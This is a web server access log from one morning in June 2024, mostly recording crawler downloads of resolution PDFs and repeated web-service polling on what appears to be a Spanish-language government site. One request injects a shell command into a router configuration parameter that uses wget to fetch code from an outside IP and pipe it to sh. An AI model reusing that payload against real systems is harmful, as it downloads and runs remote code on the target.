201.245.192.253 - - [29/Jun/2024:02:47:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:47:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [29/Jun/2024:02:48:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1083.pdf HTTP/1.1" 200 281045
66.249.66.12 - - [29/Jun/2024:02:48:18 -0500] "GET /autoliquidacion/index.php?dir=Solicitudes%20relacionadas%20con%20calidad%20del%20aire%20auditiva%20y%20visual/Evaluaci%F3n%20de%20estudios%20de%20Emisiones%20con%20miras%20a%20verificar%20el%20cumplimiento%20de%20las%20normas%20de%20emisiones/&sort=name&order=asc HTTP/1.1" 200 3251
216.244.66.195 - - [29/Jun/2024:02:48:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1164.pdf HTTP/1.1" 200 293848
52.167.144.235 - - [29/Jun/2024:02:48:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0001.pdf HTTP/1.1" 200 368629
66.249.66.11 - - [29/Jun/2024:02:48:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%203501%20AL%203600/RESOLUCION%203526%20DE%202007.pdf HTTP/1.1" 200 208928
65.109.109.110 - - [29/Jun/2024:02:48:45 -0500] "GET /Publicaciones/2023EE18713.pdf HTTP/1.1" 404 227
216.244.66.195 - - [29/Jun/2024:02:48:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1771.pdf HTTP/1.1" 200 289479
201.245.192.253 - - [29/Jun/2024:02:48:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:49:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1160.pdf HTTP/1.1" 200 514316
66.249.66.11 - - [29/Jun/2024:02:49:15 -0500] "GET /BLA/resoluciones/Autos%202008/1810.pdf HTTP/1.1" 200 171944
216.244.66.195 - - [29/Jun/2024:02:49:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/0005.pdf HTTP/1.1" 200 350176
66.249.66.12 - - [29/Jun/2024:02:49:27 -0500] "GET /Publicaciones/2024EE134395.pdf HTTP/1.1" 200 241764
66.249.66.12 - - [29/Jun/2024:02:49:30 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202022/&sort=date&order=desc HTTP/1.1" 200 330768
66.249.66.11 - - [29/Jun/2024:02:49:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202007/RES%202007%20101%20AL%20200/RESOLUCION%200187%20DE%202007.pdf HTTP/1.1" 200 154515
185.191.127.212 - - [29/Jun/2024:02:49:49 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:02:49:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:02:49:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:50:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3320.pdf HTTP/1.1" 200 350300
66.249.66.12 - - [29/Jun/2024:02:50:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/3098.pdf HTTP/1.1" 200 469849
66.249.66.11 - - [29/Jun/2024:02:50:44 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202022/&sort=size&order=desc HTTP/1.1" 200 330768
66.249.66.12 - - [29/Jun/2024:02:50:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4956.pdf HTTP/1.1" 200 351467
66.249.66.12 - - [29/Jun/2024:02:50:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201251-1301/20021265.tif HTTP/1.1" 200 95434
201.245.192.253 - - [29/Jun/2024:02:50:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:02:51:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4598.pdf HTTP/1.1" 200 489997
52.167.144.235 - - [29/Jun/2024:02:51:25 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202016/01529.pdf HTTP/1.1" 200 376415
216.245.221.92 - - [29/Jun/2024:02:51:51 -0500] "HEAD / HTTP/1.1" 200 -
95.217.1.194 - - [29/Jun/2024:02:51:52 -0500] "GET /Publicaciones/2023EE16964.pdf HTTP/1.1" 404 227
201.245.192.253 - - [29/Jun/2024:02:51:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:02:51:56 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [29/Jun/2024:02:51:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0115.pdf HTTP/1.1" 200 351871
201.245.192.253 - - [29/Jun/2024:02:51:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:50:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.12 - - [29/Jun/2024:02:52:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2950.pdf HTTP/1.1" 200 540597
54.36.232.187 - - [29/Jun/2024:02:52:29 -0500] "GET /Publicaciones/2023EE14887.pdf HTTP/1.1" 404 227
66.249.66.12 - - [29/Jun/2024:02:52:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201451-1500/20021464.tif HTTP/1.1" 200 154138
201.245.192.253 - - [29/Jun/2024:02:52:59 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:02:51:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51561
66.249.66.11 - - [29/Jun/2024:02:53:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1121.pdf HTTP/1.1" 200 396723
66.249.66.13 - - [29/Jun/2024:02:53:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4317.pdf HTTP/1.1" 200 427488
66.249.66.12 - - [29/Jun/2024:02:53:18 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20401-450/00000420.tif HTTP/1.1" 200 59558
